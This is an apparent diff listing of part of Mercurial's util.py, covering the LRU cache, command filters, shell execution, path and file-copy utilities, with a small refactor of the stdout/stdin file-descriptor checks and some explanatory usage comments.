1096 node.markempty()
1097
1097
1098 # Temporarily mark as newest item before re-adjusting head to make
1098 # Temporarily mark as newest item before re-adjusting head to make
1099 # this node the oldest item.
1099 # this node the oldest item.
1100 self._movetohead(node)
1100 self._movetohead(node)
1101 self._head = node.next
1101 self._head = node.next
1102
1102
1103 # Additional dict methods.
1103 # Additional dict methods.
1104
1104
1105 def get(self, k, default=None):
1105 def get(self, k, default=None):
1106 try:
1106 try:
1107 return self._cache[k].value
1107 return self._cache[k].value
1108 except KeyError:
1108 except KeyError:
1109 return default
1109 return default
1110
1110
1111 def clear(self):
1111 def clear(self):
1112 n = self._head
1112 n = self._head
1113 while n.key is not _notset:
1113 while n.key is not _notset:
1114 n.markempty()
1114 n.markempty()
1115 n = n.next
1115 n = n.next
1116
1116
1117 self._cache.clear()
1117 self._cache.clear()
1118
1118
1119 def copy(self):
1119 def copy(self):
1120 result = lrucachedict(self._capacity)
1120 result = lrucachedict(self._capacity)
1121 n = self._head.prev
1121 n = self._head.prev
1122 # Iterate in oldest-to-newest order, so the copy has the right ordering
1122 # Iterate in oldest-to-newest order, so the copy has the right ordering
1123 for i in range(len(self._cache)):
1123 for i in range(len(self._cache)):
1124 result[n.key] = n.value
1124 result[n.key] = n.value
1125 n = n.prev
1125 n = n.prev
1126 return result
1126 return result
1127
1127
1128 def _movetohead(self, node):
1128 def _movetohead(self, node):
1129 """Mark a node as the newest, making it the new head.
1129 """Mark a node as the newest, making it the new head.
1130
1130
1131 When a node is accessed, it becomes the freshest entry in the LRU
1131 When a node is accessed, it becomes the freshest entry in the LRU
1132 list, which is denoted by self._head.
1132 list, which is denoted by self._head.
1133
1133
1134 Visually, let's make ``N`` the new head node (* denotes head):
1134 Visually, let's make ``N`` the new head node (* denotes head):
1135
1135
1136 previous/oldest <-> head <-> next/next newest
1136 previous/oldest <-> head <-> next/next newest
1137
1137
1138 ----<->--- A* ---<->-----
1138 ----<->--- A* ---<->-----
1139 | |
1139 | |
1140 E <-> D <-> N <-> C <-> B
1140 E <-> D <-> N <-> C <-> B
1141
1141
1142 To:
1142 To:
1143
1143
1144 ----<->--- N* ---<->-----
1144 ----<->--- N* ---<->-----
1145 | |
1145 | |
1146 E <-> D <-> C <-> B <-> A
1146 E <-> D <-> C <-> B <-> A
1147
1147
1148 This requires the following moves:
1148 This requires the following moves:
1149
1149
1150 C.next = D (node.prev.next = node.next)
1150 C.next = D (node.prev.next = node.next)
1151 D.prev = C (node.next.prev = node.prev)
1151 D.prev = C (node.next.prev = node.prev)
1152 E.next = N (head.prev.next = node)
1152 E.next = N (head.prev.next = node)
1153 N.prev = E (node.prev = head.prev)
1153 N.prev = E (node.prev = head.prev)
1154 N.next = A (node.next = head)
1154 N.next = A (node.next = head)
1155 A.prev = N (head.prev = node)
1155 A.prev = N (head.prev = node)
1156 """
1156 """
1157 head = self._head
1157 head = self._head
1158 # C.next = D
1158 # C.next = D
1159 node.prev.next = node.next
1159 node.prev.next = node.next
1160 # D.prev = C
1160 # D.prev = C
1161 node.next.prev = node.prev
1161 node.next.prev = node.prev
1162 # N.prev = E
1162 # N.prev = E
1163 node.prev = head.prev
1163 node.prev = head.prev
1164 # N.next = A
1164 # N.next = A
1165 # It is tempting to do just "head" here, however if node is
1165 # It is tempting to do just "head" here, however if node is
1166 # adjacent to head, this will do bad things.
1166 # adjacent to head, this will do bad things.
1167 node.next = head.prev.next
1167 node.next = head.prev.next
1168 # E.next = N
1168 # E.next = N
1169 node.next.prev = node
1169 node.next.prev = node
1170 # A.prev = N
1170 # A.prev = N
1171 node.prev.next = node
1171 node.prev.next = node
1172
1172
1173 self._head = node
1173 self._head = node
1174
1174
1175 def _addcapacity(self):
1175 def _addcapacity(self):
1176 """Add a node to the circular linked list.
1176 """Add a node to the circular linked list.
1177
1177
1178 The new node is inserted before the head node.
1178 The new node is inserted before the head node.
1179 """
1179 """
1180 head = self._head
1180 head = self._head
1181 node = _lrucachenode()
1181 node = _lrucachenode()
1182 head.prev.next = node
1182 head.prev.next = node
1183 node.prev = head.prev
1183 node.prev = head.prev
1184 node.next = head
1184 node.next = head
1185 head.prev = node
1185 head.prev = node
1186 self._size += 1
1186 self._size += 1
1187 return node
1187 return node
1188
1188
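# Illustrative sketch: the cache behaves like a bounded mapping where the
# least recently used entry is evicted first.
#
#   >>> d = lrucachedict(2)
#   >>> d[b'a'] = 1
#   >>> d[b'b'] = 2
#   >>> d[b'a']           # touching b'a' makes it the newest entry
#   1
#   >>> d[b'c'] = 3       # b'b' is now the oldest, so it is evicted
#   >>> b'b' in d
#   False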
1189 def lrucachefunc(func):
1189 def lrucachefunc(func):
1190 '''cache most recent results of function calls'''
1190 '''cache most recent results of function calls'''
1191 cache = {}
1191 cache = {}
1192 order = collections.deque()
1192 order = collections.deque()
1193 if func.__code__.co_argcount == 1:
1193 if func.__code__.co_argcount == 1:
1194 def f(arg):
1194 def f(arg):
1195 if arg not in cache:
1195 if arg not in cache:
1196 if len(cache) > 20:
1196 if len(cache) > 20:
1197 del cache[order.popleft()]
1197 del cache[order.popleft()]
1198 cache[arg] = func(arg)
1198 cache[arg] = func(arg)
1199 else:
1199 else:
1200 order.remove(arg)
1200 order.remove(arg)
1201 order.append(arg)
1201 order.append(arg)
1202 return cache[arg]
1202 return cache[arg]
1203 else:
1203 else:
1204 def f(*args):
1204 def f(*args):
1205 if args not in cache:
1205 if args not in cache:
1206 if len(cache) > 20:
1206 if len(cache) > 20:
1207 del cache[order.popleft()]
1207 del cache[order.popleft()]
1208 cache[args] = func(*args)
1208 cache[args] = func(*args)
1209 else:
1209 else:
1210 order.remove(args)
1210 order.remove(args)
1211 order.append(args)
1211 order.append(args)
1212 return cache[args]
1212 return cache[args]
1213
1213
1214 return f
1214 return f
1215
1215
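# Illustrative sketch: lrucachefunc() can wrap any function; it keeps
# roughly the 20 most recently used results, keyed by the call arguments.
# 'square' is a hypothetical example.
#
#   @lrucachefunc
#   def square(x):
#       return x * x
#
#   square(3)     # computed and cached
#   square(3)     # served from the cache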
1216 class propertycache(object):
1216 class propertycache(object):
1217 def __init__(self, func):
1217 def __init__(self, func):
1218 self.func = func
1218 self.func = func
1219 self.name = func.__name__
1219 self.name = func.__name__
1220 def __get__(self, obj, type=None):
1220 def __get__(self, obj, type=None):
1221 result = self.func(obj)
1221 result = self.func(obj)
1222 self.cachevalue(obj, result)
1222 self.cachevalue(obj, result)
1223 return result
1223 return result
1224
1224
1225 def cachevalue(self, obj, value):
1225 def cachevalue(self, obj, value):
1226 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1226 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1227 obj.__dict__[self.name] = value
1227 obj.__dict__[self.name] = value
1228
1228
1229 def clearcachedproperty(obj, prop):
1229 def clearcachedproperty(obj, prop):
1230 '''clear a cached property value, if one has been set'''
1230 '''clear a cached property value, if one has been set'''
1231 if prop in obj.__dict__:
1231 if prop in obj.__dict__:
1232 del obj.__dict__[prop]
1232 del obj.__dict__[prop]
1233
1233
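# Illustrative sketch: propertycache computes once per instance, then
# stores the result in the instance __dict__ so later accesses bypass the
# descriptor entirely. 'widget' and computesomething() are hypothetical.
#
#   class widget(object):
#       @propertycache
#       def expensive(self):
#           return computesomething()
#
#   w = widget()
#   w.expensive                           # computed on first access
#   w.expensive                           # read straight from w.__dict__
#   clearcachedproperty(w, 'expensive')   # next access recomputes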
1234 def pipefilter(s, cmd):
1234 def pipefilter(s, cmd):
1235 '''filter string S through command CMD, returning its output'''
1235 '''filter string S through command CMD, returning its output'''
1236 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1236 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1237 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1237 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1238 pout, perr = p.communicate(s)
1238 pout, perr = p.communicate(s)
1239 return pout
1239 return pout
1240
1240
1241 def tempfilter(s, cmd):
1241 def tempfilter(s, cmd):
1242 '''filter string S through a pair of temporary files with CMD.
1242 '''filter string S through a pair of temporary files with CMD.
1243 CMD is used as a template to create the real command to be run,
1243 CMD is used as a template to create the real command to be run,
1244 with the strings INFILE and OUTFILE replaced by the real names of
1244 with the strings INFILE and OUTFILE replaced by the real names of
1245 the temporary files generated.'''
1245 the temporary files generated.'''
1246 inname, outname = None, None
1246 inname, outname = None, None
1247 try:
1247 try:
1248 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1248 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1249 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1249 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1250 fp.write(s)
1250 fp.write(s)
1251 fp.close()
1251 fp.close()
1252 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1252 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1253 os.close(outfd)
1253 os.close(outfd)
1254 cmd = cmd.replace('INFILE', inname)
1254 cmd = cmd.replace('INFILE', inname)
1255 cmd = cmd.replace('OUTFILE', outname)
1255 cmd = cmd.replace('OUTFILE', outname)
1256 code = os.system(cmd)
1256 code = os.system(cmd)
1257 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1257 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1258 code = 0
1258 code = 0
1259 if code:
1259 if code:
1260 raise Abort(_("command '%s' failed: %s") %
1260 raise Abort(_("command '%s' failed: %s") %
1261 (cmd, explainexit(code)))
1261 (cmd, explainexit(code)))
1262 return readfile(outname)
1262 return readfile(outname)
1263 finally:
1263 finally:
1264 try:
1264 try:
1265 if inname:
1265 if inname:
1266 os.unlink(inname)
1266 os.unlink(inname)
1267 except OSError:
1267 except OSError:
1268 pass
1268 pass
1269 try:
1269 try:
1270 if outname:
1270 if outname:
1271 os.unlink(outname)
1271 os.unlink(outname)
1272 except OSError:
1272 except OSError:
1273 pass
1273 pass
1274
1274
1275 filtertable = {
1275 filtertable = {
1276 'tempfile:': tempfilter,
1276 'tempfile:': tempfilter,
1277 'pipe:': pipefilter,
1277 'pipe:': pipefilter,
1278 }
1278 }
1279
1279
1280 def filter(s, cmd):
1280 def filter(s, cmd):
1281 "filter a string through a command that transforms its input to its output"
1281 "filter a string through a command that transforms its input to its output"
1282 for name, fn in filtertable.iteritems():
1282 for name, fn in filtertable.iteritems():
1283 if cmd.startswith(name):
1283 if cmd.startswith(name):
1284 return fn(s, cmd[len(name):].lstrip())
1284 return fn(s, cmd[len(name):].lstrip())
1285 return pipefilter(s, cmd)
1285 return pipefilter(s, cmd)
1286
1286
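# Illustrative sketch: a command prefixed with 'tempfile:' runs with the
# INFILE/OUTFILE placeholders substituted; anything else is treated as a
# pipe. The shell commands below are hypothetical.
#
#   filter(b'some text\n', b'pipe: tr a-z A-Z')
#   filter(b'x\n', b'tempfile: sed s/x/y/ INFILE > OUTFILE')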
1287 def binary(s):
1287 def binary(s):
1288 """return true if a string is binary data"""
1288 """return true if a string is binary data"""
1289 return bool(s and '\0' in s)
1289 return bool(s and '\0' in s)
1290
1290
1291 def increasingchunks(source, min=1024, max=65536):
1291 def increasingchunks(source, min=1024, max=65536):
1292 '''return no less than min bytes per chunk while data remains,
1292 '''return no less than min bytes per chunk while data remains,
1293 doubling min after each chunk until it reaches max'''
1293 doubling min after each chunk until it reaches max'''
1294 def log2(x):
1294 def log2(x):
1295 if not x:
1295 if not x:
1296 return 0
1296 return 0
1297 i = 0
1297 i = 0
1298 while x:
1298 while x:
1299 x >>= 1
1299 x >>= 1
1300 i += 1
1300 i += 1
1301 return i - 1
1301 return i - 1
1302
1302
1303 buf = []
1303 buf = []
1304 blen = 0
1304 blen = 0
1305 for chunk in source:
1305 for chunk in source:
1306 buf.append(chunk)
1306 buf.append(chunk)
1307 blen += len(chunk)
1307 blen += len(chunk)
1308 if blen >= min:
1308 if blen >= min:
1309 if min < max:
1309 if min < max:
1310 min = min << 1
1310 min = min << 1
1311 nmin = 1 << log2(blen)
1311 nmin = 1 << log2(blen)
1312 if nmin > min:
1312 if nmin > min:
1313 min = nmin
1313 min = nmin
1314 if min > max:
1314 if min > max:
1315 min = max
1315 min = max
1316 yield ''.join(buf)
1316 yield ''.join(buf)
1317 blen = 0
1317 blen = 0
1318 buf = []
1318 buf = []
1319 if buf:
1319 if buf:
1320 yield ''.join(buf)
1320 yield ''.join(buf)
1321
1321
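# Illustrative sketch (Python 2 semantics, where '' is bytes): chunk sizes
# double from min until they reach max, with a final short chunk for any
# remainder.
#
#   >>> gen = increasingchunks(iter(['x' * 1024] * 8))
#   >>> [len(c) for c in gen]
#   [1024, 2048, 4096, 1024]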
1322 Abort = error.Abort
1322 Abort = error.Abort
1323
1323
1324 def always(fn):
1324 def always(fn):
1325 return True
1325 return True
1326
1326
1327 def never(fn):
1327 def never(fn):
1328 return False
1328 return False
1329
1329
1330 def nogc(func):
1330 def nogc(func):
1331 """disable garbage collector
1331 """disable garbage collector
1332
1332
1333 Python's garbage collector triggers a GC each time a certain number of
1333 Python's garbage collector triggers a GC each time a certain number of
1334 container objects (the number being defined by gc.get_threshold()) are
1334 container objects (the number being defined by gc.get_threshold()) are
1335 allocated even when marked not to be tracked by the collector. Tracking has
1335 allocated even when marked not to be tracked by the collector. Tracking has
1336 no effect on when GCs are triggered, only on what objects the GC looks
1336 no effect on when GCs are triggered, only on what objects the GC looks
1337 into. As a workaround, disable GC while building complex (huge)
1337 into. As a workaround, disable GC while building complex (huge)
1338 containers.
1338 containers.
1339
1339
1340 This garbage collector issue has been fixed in 2.7. But it still affects
1340 This garbage collector issue has been fixed in 2.7. But it still affects
1341 CPython's performance.
1341 CPython's performance.
1342 """
1342 """
1343 def wrapper(*args, **kwargs):
1343 def wrapper(*args, **kwargs):
1344 gcenabled = gc.isenabled()
1344 gcenabled = gc.isenabled()
1345 gc.disable()
1345 gc.disable()
1346 try:
1346 try:
1347 return func(*args, **kwargs)
1347 return func(*args, **kwargs)
1348 finally:
1348 finally:
1349 if gcenabled:
1349 if gcenabled:
1350 gc.enable()
1350 gc.enable()
1351 return wrapper
1351 return wrapper
1352
1352
1353 if pycompat.ispypy:
1353 if pycompat.ispypy:
1354 # PyPy runs slower with gc disabled
1354 # PyPy runs slower with gc disabled
1355 nogc = lambda x: x
1355 nogc = lambda x: x
1356
1356
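# Illustrative sketch: decorate builders of huge containers so CPython's
# collector doesn't repeatedly scan the partially built object.
# buildindex() is a hypothetical example.
#
#   @nogc
#   def buildindex(entries):
#       return dict(entries)   # GC is re-enabled afterwards if it was on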
1357 def pathto(root, n1, n2):
1357 def pathto(root, n1, n2):
1358 '''return the relative path from one place to another.
1358 '''return the relative path from one place to another.
1359 root should use os.sep to separate directories
1359 root should use os.sep to separate directories
1360 n1 should use os.sep to separate directories
1360 n1 should use os.sep to separate directories
1361 n2 should use "/" to separate directories
1361 n2 should use "/" to separate directories
1362 returns an os.sep-separated path.
1362 returns an os.sep-separated path.
1363
1363
1364 If n1 is a relative path, it's assumed it's
1364 If n1 is a relative path, it's assumed it's
1365 relative to root.
1365 relative to root.
1366 n2 should always be relative to root.
1366 n2 should always be relative to root.
1367 '''
1367 '''
1368 if not n1:
1368 if not n1:
1369 return localpath(n2)
1369 return localpath(n2)
1370 if os.path.isabs(n1):
1370 if os.path.isabs(n1):
1371 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1371 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1372 return os.path.join(root, localpath(n2))
1372 return os.path.join(root, localpath(n2))
1373 n2 = '/'.join((pconvert(root), n2))
1373 n2 = '/'.join((pconvert(root), n2))
1374 a, b = splitpath(n1), n2.split('/')
1374 a, b = splitpath(n1), n2.split('/')
1375 a.reverse()
1375 a.reverse()
1376 b.reverse()
1376 b.reverse()
1377 while a and b and a[-1] == b[-1]:
1377 while a and b and a[-1] == b[-1]:
1378 a.pop()
1378 a.pop()
1379 b.pop()
1379 b.pop()
1380 b.reverse()
1380 b.reverse()
1381 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1381 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1382
1382
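# Illustrative sketch (POSIX separators, hypothetical paths):
#
#   >>> pathto(b'/repo', b'/repo/a/b', b'c/d')
#   '../../c/d'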
1383 def mainfrozen():
1383 def mainfrozen():
1384 """return True if we are a frozen executable.
1384 """return True if we are a frozen executable.
1385
1385
1386 The code supports py2exe (most common, Windows only) and tools/freeze
1386 The code supports py2exe (most common, Windows only) and tools/freeze
1387 (portable, not much used).
1387 (portable, not much used).
1388 """
1388 """
1389 return (safehasattr(sys, "frozen") or # new py2exe
1389 return (safehasattr(sys, "frozen") or # new py2exe
1390 safehasattr(sys, "importers") or # old py2exe
1390 safehasattr(sys, "importers") or # old py2exe
1391 imp.is_frozen(u"__main__")) # tools/freeze
1391 imp.is_frozen(u"__main__")) # tools/freeze
1392
1392
1393 # the location of data files matching the source code
1393 # the location of data files matching the source code
1394 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1394 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1395 # executable version (py2exe) doesn't support __file__
1395 # executable version (py2exe) doesn't support __file__
1396 datapath = os.path.dirname(pycompat.sysexecutable)
1396 datapath = os.path.dirname(pycompat.sysexecutable)
1397 else:
1397 else:
1398 datapath = os.path.dirname(pycompat.fsencode(__file__))
1398 datapath = os.path.dirname(pycompat.fsencode(__file__))
1399
1399
1400 i18n.setdatapath(datapath)
1400 i18n.setdatapath(datapath)
1401
1401
1402 _hgexecutable = None
1402 _hgexecutable = None
1403
1403
1404 def hgexecutable():
1404 def hgexecutable():
1405 """return location of the 'hg' executable.
1405 """return location of the 'hg' executable.
1406
1406
1407 Defaults to $HG or 'hg' in the search path.
1407 Defaults to $HG or 'hg' in the search path.
1408 """
1408 """
1409 if _hgexecutable is None:
1409 if _hgexecutable is None:
1410 hg = encoding.environ.get('HG')
1410 hg = encoding.environ.get('HG')
1411 mainmod = sys.modules[pycompat.sysstr('__main__')]
1411 mainmod = sys.modules[pycompat.sysstr('__main__')]
1412 if hg:
1412 if hg:
1413 _sethgexecutable(hg)
1413 _sethgexecutable(hg)
1414 elif mainfrozen():
1414 elif mainfrozen():
1415 if getattr(sys, 'frozen', None) == 'macosx_app':
1415 if getattr(sys, 'frozen', None) == 'macosx_app':
1416 # Env variable set by py2app
1416 # Env variable set by py2app
1417 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1417 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1418 else:
1418 else:
1419 _sethgexecutable(pycompat.sysexecutable)
1419 _sethgexecutable(pycompat.sysexecutable)
1420 elif (os.path.basename(
1420 elif (os.path.basename(
1421 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1421 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1422 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1422 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1423 else:
1423 else:
1424 exe = findexe('hg') or os.path.basename(sys.argv[0])
1424 exe = findexe('hg') or os.path.basename(sys.argv[0])
1425 _sethgexecutable(exe)
1425 _sethgexecutable(exe)
1426 return _hgexecutable
1426 return _hgexecutable
1427
1427
1428 def _sethgexecutable(path):
1428 def _sethgexecutable(path):
1429 """set location of the 'hg' executable"""
1429 """set location of the 'hg' executable"""
1430 global _hgexecutable
1430 global _hgexecutable
1431 _hgexecutable = path
1431 _hgexecutable = path
1432
1432
1433 def _isstdout(f):
1433 def _testfileno(f, stdf):
1434 fileno = getattr(f, 'fileno', None)
1434 fileno = getattr(f, 'fileno', None)
1435 try:
1435 try:
1436 return fileno and fileno() == sys.__stdout__.fileno()
1436 return fileno and fileno() == stdf.fileno()
1437 except io.UnsupportedOperation:
1437 except io.UnsupportedOperation:
1438 return False # fileno() raised UnsupportedOperation
1438 return False # fileno() raised UnsupportedOperation
1439
1439
1440 def isstdin(f):
1441 return _testfileno(f, sys.__stdin__)
1442
1443 def isstdout(f):
1444 return _testfileno(f, sys.__stdout__)
1445
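# Illustrative sketch: these helpers compare file descriptors against the
# process's original standard streams, so wrappers around the same fd
# still match, while unrelated or fd-less files do not.
#
#   >>> import io, sys
#   >>> isstdout(sys.__stdout__)
#   True
#   >>> isstdout(io.BytesIO())    # fileno() raises UnsupportedOperation
#   False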
1440 def shellenviron(environ=None):
1446 def shellenviron(environ=None):
1441 """return environ with optional override, useful for shelling out"""
1447 """return environ with optional override, useful for shelling out"""
1442 def py2shell(val):
1448 def py2shell(val):
1443 'convert python object into string that is useful to shell'
1449 'convert python object into string that is useful to shell'
1444 if val is None or val is False:
1450 if val is None or val is False:
1445 return '0'
1451 return '0'
1446 if val is True:
1452 if val is True:
1447 return '1'
1453 return '1'
1448 return pycompat.bytestr(val)
1454 return pycompat.bytestr(val)
1449 env = dict(encoding.environ)
1455 env = dict(encoding.environ)
1450 if environ:
1456 if environ:
1451 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1457 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1452 env['HG'] = hgexecutable()
1458 env['HG'] = hgexecutable()
1453 return env
1459 return env
1454
1460
1455 def system(cmd, environ=None, cwd=None, out=None):
1461 def system(cmd, environ=None, cwd=None, out=None):
1456 '''enhanced shell command execution.
1462 '''enhanced shell command execution.
1457 run with environment maybe modified, maybe in different dir.
1463 run with environment maybe modified, maybe in different dir.
1458
1464
1459 if out is specified, it is assumed to be a file-like object that has a
1465 if out is specified, it is assumed to be a file-like object that has a
1460 write() method. stdout and stderr will be redirected to out.'''
1466 write() method. stdout and stderr will be redirected to out.'''
1461 try:
1467 try:
1462 stdout.flush()
1468 stdout.flush()
1463 except Exception:
1469 except Exception:
1464 pass
1470 pass
1465 cmd = quotecommand(cmd)
1471 cmd = quotecommand(cmd)
1466 env = shellenviron(environ)
1472 env = shellenviron(environ)
1467 if out is None or _isstdout(out):
1473 if out is None or isstdout(out):
1468 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1474 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1469 env=env, cwd=cwd)
1475 env=env, cwd=cwd)
1470 else:
1476 else:
1471 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1477 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1472 env=env, cwd=cwd, stdout=subprocess.PIPE,
1478 env=env, cwd=cwd, stdout=subprocess.PIPE,
1473 stderr=subprocess.STDOUT)
1479 stderr=subprocess.STDOUT)
1474 for line in iter(proc.stdout.readline, ''):
1480 for line in iter(proc.stdout.readline, ''):
1475 out.write(line)
1481 out.write(line)
1476 proc.wait()
1482 proc.wait()
1477 rc = proc.returncode
1483 rc = proc.returncode
1478 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1484 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1479 rc = 0
1485 rc = 0
1480 return rc
1486 return rc
1481
1487
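# Illustrative sketch: 'out' may be any object with a write() method; when
# it is not the real stdout, output is piped through it line by line.
# The command and 'buf' (a file-like buffer) are hypothetical.
#
#   rc = system(b'make docs', environ={b'V': 1}, cwd=b'/src')
#   rc = system(b'make docs', out=buf)   # lines written to buf instead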
1482 def checksignature(func):
1488 def checksignature(func):
1483 '''wrap a function with code to check for calling errors'''
1489 '''wrap a function with code to check for calling errors'''
1484 def check(*args, **kwargs):
1490 def check(*args, **kwargs):
1485 try:
1491 try:
1486 return func(*args, **kwargs)
1492 return func(*args, **kwargs)
1487 except TypeError:
1493 except TypeError:
1488 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1494 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1489 raise error.SignatureError
1495 raise error.SignatureError
1490 raise
1496 raise
1491
1497
1492 return check
1498 return check
1493
1499
1494 # a whitelist of known filesystems where hardlinks work reliably
1500 # a whitelist of known filesystems where hardlinks work reliably
1495 _hardlinkfswhitelist = {
1501 _hardlinkfswhitelist = {
1496 'btrfs',
1502 'btrfs',
1497 'ext2',
1503 'ext2',
1498 'ext3',
1504 'ext3',
1499 'ext4',
1505 'ext4',
1500 'hfs',
1506 'hfs',
1501 'jfs',
1507 'jfs',
1502 'NTFS',
1508 'NTFS',
1503 'reiserfs',
1509 'reiserfs',
1504 'tmpfs',
1510 'tmpfs',
1505 'ufs',
1511 'ufs',
1506 'xfs',
1512 'xfs',
1507 'zfs',
1513 'zfs',
1508 }
1514 }
1509
1515
1510 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1516 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1511 '''copy a file, preserving mode and optionally other stat info like
1517 '''copy a file, preserving mode and optionally other stat info like
1512 atime/mtime
1518 atime/mtime
1513
1519
1514 checkambig argument is used with filestat, and is useful only if
1520 checkambig argument is used with filestat, and is useful only if
1515 destination file is guarded by any lock (e.g. repo.lock or
1521 destination file is guarded by any lock (e.g. repo.lock or
1516 repo.wlock).
1522 repo.wlock).
1517
1523
1518 copystat and checkambig should be exclusive.
1524 copystat and checkambig should be exclusive.
1519 '''
1525 '''
1520 assert not (copystat and checkambig)
1526 assert not (copystat and checkambig)
1521 oldstat = None
1527 oldstat = None
1522 if os.path.lexists(dest):
1528 if os.path.lexists(dest):
1523 if checkambig:
1529 if checkambig:
1524 oldstat = checkambig and filestat.frompath(dest)
1530 oldstat = checkambig and filestat.frompath(dest)
1525 unlink(dest)
1531 unlink(dest)
1526 if hardlink:
1532 if hardlink:
1527 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1533 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1528 # unless we are confident that dest is on a whitelisted filesystem.
1534 # unless we are confident that dest is on a whitelisted filesystem.
1529 try:
1535 try:
1530 fstype = getfstype(os.path.dirname(dest))
1536 fstype = getfstype(os.path.dirname(dest))
1531 except OSError:
1537 except OSError:
1532 fstype = None
1538 fstype = None
1533 if fstype not in _hardlinkfswhitelist:
1539 if fstype not in _hardlinkfswhitelist:
1534 hardlink = False
1540 hardlink = False
1535 if hardlink:
1541 if hardlink:
1536 try:
1542 try:
1537 oslink(src, dest)
1543 oslink(src, dest)
1538 return
1544 return
1539 except (IOError, OSError):
1545 except (IOError, OSError):
1540 pass # fall back to normal copy
1546 pass # fall back to normal copy
1541 if os.path.islink(src):
1547 if os.path.islink(src):
1542 os.symlink(os.readlink(src), dest)
1548 os.symlink(os.readlink(src), dest)
1543 # copytime is ignored for symlinks, but in general copytime isn't needed
1549 # copytime is ignored for symlinks, but in general copytime isn't needed
1544 # for them anyway
1550 # for them anyway
1545 else:
1551 else:
1546 try:
1552 try:
1547 shutil.copyfile(src, dest)
1553 shutil.copyfile(src, dest)
1548 if copystat:
1554 if copystat:
1549 # copystat also copies mode
1555 # copystat also copies mode
1550 shutil.copystat(src, dest)
1556 shutil.copystat(src, dest)
1551 else:
1557 else:
1552 shutil.copymode(src, dest)
1558 shutil.copymode(src, dest)
1553 if oldstat and oldstat.stat:
1559 if oldstat and oldstat.stat:
1554 newstat = filestat.frompath(dest)
1560 newstat = filestat.frompath(dest)
1555 if newstat.isambig(oldstat):
1561 if newstat.isambig(oldstat):
1556 # stat of copied file is ambiguous to original one
1562 # stat of copied file is ambiguous to original one
1557 advanced = (
1563 advanced = (
1558 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1564 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1559 os.utime(dest, (advanced, advanced))
1565 os.utime(dest, (advanced, advanced))
1560 except shutil.Error as inst:
1566 except shutil.Error as inst:
1561 raise Abort(str(inst))
1567 raise Abort(str(inst))
1562
1568
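# Illustrative sketch (hypothetical file names): hardlinking is only
# attempted when the destination filesystem is in _hardlinkfswhitelist;
# otherwise (or on link failure) a plain copy preserving the mode is made.
#
#   copyfile(b'a.txt', b'b.txt', hardlink=True)
#   copyfile(b'a.txt', b'c.txt', copystat=True)   # also copies atime/mtime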
1563 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1569 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1564 """Copy a directory tree using hardlinks if possible."""
1570 """Copy a directory tree using hardlinks if possible."""
1565 num = 0
1571 num = 0
1566
1572
1567 gettopic = lambda: hardlink and _('linking') or _('copying')
1573 gettopic = lambda: hardlink and _('linking') or _('copying')
1568
1574
1569 if os.path.isdir(src):
1575 if os.path.isdir(src):
1570 if hardlink is None:
1576 if hardlink is None:
1571 hardlink = (os.stat(src).st_dev ==
1577 hardlink = (os.stat(src).st_dev ==
1572 os.stat(os.path.dirname(dst)).st_dev)
1578 os.stat(os.path.dirname(dst)).st_dev)
1573 topic = gettopic()
1579 topic = gettopic()
1574 os.mkdir(dst)
1580 os.mkdir(dst)
1575 for name, kind in listdir(src):
1581 for name, kind in listdir(src):
1576 srcname = os.path.join(src, name)
1582 srcname = os.path.join(src, name)
1577 dstname = os.path.join(dst, name)
1583 dstname = os.path.join(dst, name)
1578 def nprog(t, pos):
1584 def nprog(t, pos):
1579 if pos is not None:
1585 if pos is not None:
1580 return progress(t, pos + num)
1586 return progress(t, pos + num)
1581 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1587 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1582 num += n
1588 num += n
1583 else:
1589 else:
1584 if hardlink is None:
1590 if hardlink is None:
1585 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1591 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1586 os.stat(os.path.dirname(dst)).st_dev)
1592 os.stat(os.path.dirname(dst)).st_dev)
1587 topic = gettopic()
1593 topic = gettopic()
1588
1594
1589 if hardlink:
1595 if hardlink:
1590 try:
1596 try:
